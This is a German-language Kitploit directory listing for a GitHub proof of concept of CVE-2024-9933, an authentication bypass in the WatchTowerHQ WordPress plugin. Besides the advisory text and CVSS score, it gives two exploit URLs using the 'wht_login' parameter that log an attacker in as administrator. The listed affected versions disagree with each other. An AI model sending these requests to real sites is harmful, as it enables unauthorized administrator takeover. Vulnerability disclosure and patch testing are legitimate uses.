Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-9933 — WatchTowerHQ <= 3.10.1 - Authentifizierungsumgehung zum Administrator aufgrund fehlender Prüfung auf leere Werte | Kitploit
Tools/GitHubGitHub/randomrobbiebf/cve-2024-9933
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubrandomrobbiebf/cve-2024-9933

CVE-2024-9933

WatchTowerHQ <= 3.10.1 - Authentifizierungsumgehung zum Administrator aufgrund fehlender Prüfung auf leere Werte

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-9933

WatchTowerHQ <= 3.10.1 - Authentifizierungsumgehung zum Administrator aufgrund fehlender Prüfung auf leeren Wert

Beschreibung:

Das WatchTowerHQ-Plugin für WordPress ist in Versionen bis einschließlich 3.9.6 anfällig für eine Authentifizierungsumgehung. Dies liegt daran, dass der Standardwert von 'watchtower_ota_token' leer ist und die Prüfung auf einen nicht leeren Wert in der Funktion 'Password_Less_Access::login' fehlt. Dadurch ist es nicht authentifizierten Angreifern möglich, sich als WatchTowerHQ-Client-Administratorbenutzer anzumelden.

root@kitploit:~
State: PUBLISHED
Score: 9.8
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

POC

root@kitploit:~
http://kubernetes.docker.internal/?wht_login=1

OR

http://kubernetes.docker.internal/?wht_login=1&access_token=not_set

Wenn das System anfällig ist, werden Sie als Administrator angemeldet.

Tool herunterladen